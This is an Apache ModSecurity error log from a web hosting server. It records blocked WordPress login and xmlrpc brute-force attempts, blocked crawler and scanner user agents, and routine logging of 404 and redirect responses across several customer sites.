[Tue May 26 16:04:19.416397 2026] [security2:error] [pid 762634:tid 762829] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3K7x8rj1VZMqUAOeGZQAAAEE"]
[Tue May 26 16:04:20.829530 2026] [security2:error] [pid 762634:tid 762774] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3LLx8rj1VZMqUAOeGhwAAAAo"]
[Tue May 26 16:04:22.089576 2026] [security2:error] [pid 762634:tid 762768] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Lbx8rj1VZMqUAOeGqgAAAAQ"]
[Tue May 26 16:04:22.715640 2026] [security2:error] [pid 762634:tid 762818] [client 69.164.217.74:40558] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.85"] [uri "/index.cgi"] [unique_id "ahV3Lrx8rj1VZMqUAOeGygAAADY"]
[Tue May 26 16:04:24.575574 2026] [security2:error] [pid 762634:tid 762761] [remote 54.36.102.244:58774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahV3MLx8rj1VZMqUAOeHCAAAC34"]
[Tue May 26 16:04:24.689820 2026] [security2:error] [pid 762634:tid 762773] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3MLx8rj1VZMqUAOeHBgAAAAk"]
[Tue May 26 16:04:24.900883 2026] [security2:error] [pid 762634:tid 762780] [client 113.173.2.190:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3MLx8rj1VZMqUAOeHCwAAABA"]
[Tue May 26 16:04:25.967460 2026] [security2:error] [pid 762634:tid 762826] [client 106.219.85.83:11555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Mbx8rj1VZMqUAOeHNwAAAD4"]
[Tue May 26 16:04:25.970706 2026] [security2:error] [pid 762634:tid 762826] [client 106.219.85.83:11555] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Mbx8rj1VZMqUAOeHNwAAAD4"]
[Tue May 26 16:04:26.316446 2026] [security2:error] [pid 762634:tid 762838] [client 173.239.240.40:22271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 40.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahV3Mrx8rj1VZMqUAOeHQAAAAEo"]
[Tue May 26 16:04:26.349531 2026] [security2:error] [pid 762634:tid 762881] [client 173.239.240.55:21795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahV3Mrx8rj1VZMqUAOeHQQAAAHU"]
[Tue May 26 16:04:26.362504 2026] [security2:error] [pid 762634:tid 762770] [client 173.239.240.46:51191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahV3Mrx8rj1VZMqUAOeHQgAAAAY"]
[Tue May 26 16:04:26.760734 2026] [security2:error] [pid 762634:tid 762865] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Mrx8rj1VZMqUAOeHTgAAAGU"]
[Tue May 26 16:04:26.960243 2026] [security2:error] [pid 762634:tid 762810] [client 103.153.130.62:59336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Mrx8rj1VZMqUAOeHVAAAAC4"]
[Tue May 26 16:04:26.960494 2026] [security2:error] [pid 762634:tid 762810] [client 103.153.130.62:59336] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Mrx8rj1VZMqUAOeHVAAAAC4"]
[Tue May 26 16:04:26.990965 2026] [security2:error] [pid 762634:tid 762820] [client 114.119.137.103:60943] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/central-ontario.php"] [unique_id "ahV3Mrx8rj1VZMqUAOeHWwAAADg"], referer: https://www.toronto121mortgage.com/
[Tue May 26 16:04:27.025427 2026] [security2:error] [pid 762634:tid 762842] [client 103.44.52.196:55654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3M7x8rj1VZMqUAOeHXAAAAE4"]
[Tue May 26 16:04:27.025578 2026] [security2:error] [pid 762634:tid 762842] [client 103.44.52.196:55654] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3M7x8rj1VZMqUAOeHXAAAAE4"]
[Tue May 26 16:04:28.630249 2026] [security2:error] [pid 762634:tid 762792] [client 62.60.130.233:56741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahV3NLx8rj1VZMqUAOeHigAAABw"], referer: https://www.reddit.com/
[Tue May 26 16:04:28.814808 2026] [security2:error] [pid 762634:tid 762812] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3NLx8rj1VZMqUAOeHgQAAADA"]
[Tue May 26 16:04:28.973237 2026] [security2:error] [pid 762634:tid 762842] [client 62.60.130.233:63232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahV3NLx8rj1VZMqUAOeHmQAAAE4"], referer: https://www.reddit.com/
[Tue May 26 16:04:30.944984 2026] [security2:error] [pid 762634:tid 762803] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Nrx8rj1VZMqUAOeHwAAAACc"]
[Tue May 26 16:04:32.073497 2026] [security2:error] [pid 762634:tid 762708] [remote 163.61.60.30:46814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahV3N7x8rj1VZMqUAOeH4wAAU0k"]
[Tue May 26 16:04:32.964741 2026] [security2:error] [pid 762634:tid 762817] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3OLx8rj1VZMqUAOeH7wAAADU"]
[Tue May 26 16:04:33.026303 2026] [security2:error] [pid 762634:tid 762766] [client 45.79.207.181:49000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "pronumbers.com.au"] [uri "/400.shtml"] [unique_id "ahV3Obx8rj1VZMqUAOeIAAAAAAI"]
[Tue May 26 16:04:34.977890 2026] [security2:error] [pid 762634:tid 762880] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Orx8rj1VZMqUAOeIKQAAAHQ"]
[Tue May 26 16:04:36.392935 2026] [security2:error] [pid 762634:tid 762804] [client 106.219.85.83:14017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3PLx8rj1VZMqUAOeIUQAAACg"]
[Tue May 26 16:04:36.393079 2026] [security2:error] [pid 762634:tid 762804] [client 106.219.85.83:14017] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3PLx8rj1VZMqUAOeIUQAAACg"]
[Tue May 26 16:04:37.236559 2026] [security2:error] [pid 762634:tid 762767] [client 103.153.130.62:51262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Pbx8rj1VZMqUAOeIbAAAAAM"]
[Tue May 26 16:04:37.236805 2026] [security2:error] [pid 762634:tid 762767] [client 103.153.130.62:51262] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Pbx8rj1VZMqUAOeIbAAAAAM"]
[Tue May 26 16:04:37.274908 2026] [security2:error] [pid 762634:tid 762798] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3PLx8rj1VZMqUAOeIXwAAACI"]
[Tue May 26 16:04:37.557064 2026] [security2:error] [pid 762634:tid 762863] [client 103.44.52.196:34314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Pbx8rj1VZMqUAOeIdAAAAGM"]
[Tue May 26 16:04:37.557241 2026] [security2:error] [pid 762634:tid 762863] [client 103.44.52.196:34314] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Pbx8rj1VZMqUAOeIdAAAAGM"]
[Tue May 26 16:04:39.126175 2026] [security2:error] [pid 762634:tid 762843] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Prx8rj1VZMqUAOeIjwAAAE8"]
[Tue May 26 16:04:39.367863 2026] [security2:error] [pid 762634:tid 762768] [client 209.50.191.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3P7x8rj1VZMqUAOeIpAAAAAQ"], referer: http://www.anujtradingco.com/
[Tue May 26 16:04:39.943272 2026] [security2:error] [pid 762634:tid 762721] [remote 49.12.3.147:33802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahV3P7x8rj1VZMqUAOeIrwAAVFY"]
[Tue May 26 16:04:40.007968 2026] [security2:error] [pid 762634:tid 762825] [client 209.50.191.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3P7x8rj1VZMqUAOeItwAAAD0"], referer: http://www.anujtradingco.com/blog-2/blog-boxed-bigtext/
[Tue May 26 16:04:40.650037 2026] [security2:error] [pid 762634:tid 762812] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3QLx8rj1VZMqUAOeIygAAADA"]
[Tue May 26 16:04:42.704355 2026] [security2:error] [pid 762634:tid 762792] [client 209.50.191.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3Qrx8rj1VZMqUAOeJCAAAABw"], referer: https://anujtradingco.com/
[Tue May 26 16:04:42.827194 2026] [security2:error] [pid 762634:tid 762826] [client 92.119.63.133:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3Qrx8rj1VZMqUAOeJCwAAAD4"]
[Tue May 26 16:04:43.372582 2026] [security2:error] [pid 762634:tid 762806] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Qrx8rj1VZMqUAOeJEQAAACo"]
[Tue May 26 16:04:44.898915 2026] [security2:error] [pid 762634:tid 762872] [client 14.253.140.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3RLx8rj1VZMqUAOeJPQAAAGw"]
[Tue May 26 16:04:45.032032 2026] [security2:error] [pid 762634:tid 762779] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3RLx8rj1VZMqUAOeJNwAAAA8"]
[Tue May 26 16:04:45.308713 2026] [security2:error] [pid 762634:tid 762732] [remote 45.32.67.165:37640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahV3Rbx8rj1VZMqUAOeJQQAAG2E"]
[Tue May 26 16:04:46.348490 2026] [security2:error] [pid 762634:tid 762739] [remote 82.196.25.136:40122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahV3Rrx8rj1VZMqUAOeJUgAARGg"]
[Tue May 26 16:04:46.838086 2026] [security2:error] [pid 762634:tid 762784] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Rrx8rj1VZMqUAOeJWAAAABQ"]
[Tue May 26 16:04:46.997466 2026] [security2:error] [pid 762634:tid 762883] [client 106.219.85.83:30263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Rrx8rj1VZMqUAOeJawAAAHc"]
[Tue May 26 16:04:46.997726 2026] [security2:error] [pid 762634:tid 762883] [client 106.219.85.83:30263] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Rrx8rj1VZMqUAOeJawAAAHc"]
[Tue May 26 16:04:49.411124 2026] [security2:error] [pid 762634:tid 762775] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3SLx8rj1VZMqUAOeJqAAAAAs"]
[Tue May 26 16:04:50.876421 2026] [security2:error] [pid 762634:tid 762817] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Srx8rj1VZMqUAOeJzwAAADU"]
[Tue May 26 16:04:51.543105 2026] [security2:error] [pid 762634:tid 762882] [client 106.215.153.172:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3S7x8rj1VZMqUAOeJ5AAAAHY"]
[Tue May 26 16:04:51.797557 2026] [security2:error] [pid 762634:tid 762839] [client 103.44.52.196:55104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3S7x8rj1VZMqUAOeJ9AAAAEs"]
[Tue May 26 16:04:51.797703 2026] [security2:error] [pid 762634:tid 762839] [client 103.44.52.196:55104] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3S7x8rj1VZMqUAOeJ9AAAAEs"]
[Tue May 26 16:04:53.568083 2026] [security2:error] [pid 762634:tid 762881] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Tbx8rj1VZMqUAOeKGAAAAHU"]
[Tue May 26 16:04:54.960230 2026] [security2:error] [pid 762634:tid 762867] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Trx8rj1VZMqUAOeKQAAAAGc"]
[Tue May 26 16:04:55.333761 2026] [security2:error] [pid 762634:tid 762846] [client 103.108.58.177:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahV3TLx8rj1VZMqUAOeKDAAAUnU"]
[Tue May 26 16:04:56.596153 2026] [security2:error] [pid 762634:tid 762842] [client 31.57.184.107:50749] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahV3ULx8rj1VZMqUAOeKgwAAAE4"]
[Tue May 26 16:04:56.752659 2026] [security2:error] [pid 762634:tid 762807] [client 216.51.235.102:56288] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "162.215.241.212"] [uri "/"] [unique_id "ahV3ULx8rj1VZMqUAOeKhAAAACs"]
[Tue May 26 16:04:57.676061 2026] [security2:error] [pid 762634:tid 762891] [client 106.219.85.83:5552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Ubx8rj1VZMqUAOeKogAAAH8"]
[Tue May 26 16:04:57.676302 2026] [security2:error] [pid 762634:tid 762891] [client 106.219.85.83:5552] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Ubx8rj1VZMqUAOeKogAAAH8"]
[Tue May 26 16:04:57.703562 2026] [security2:error] [pid 762634:tid 762793] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Ubx8rj1VZMqUAOeKmgAAAB0"]
[Tue May 26 16:04:58.441700 2026] [security2:error] [pid 762634:tid 762864] [client 103.44.52.196:56736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Urx8rj1VZMqUAOeKrwAAAGQ"]
[Tue May 26 16:04:58.441838 2026] [security2:error] [pid 762634:tid 762864] [client 103.44.52.196:56736] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Urx8rj1VZMqUAOeKrwAAAGQ"]
[Tue May 26 16:04:59.143986 2026] [security2:error] [pid 762634:tid 762876] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Urx8rj1VZMqUAOeKuAAAAHA"]
[Tue May 26 16:05:00.345279 2026] [security2:error] [pid 762634:tid 762884] [client 141.164.80.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3VLx8rj1VZMqUAOeK2wAAAHg"], referer: https://www.anujtradingco.com/
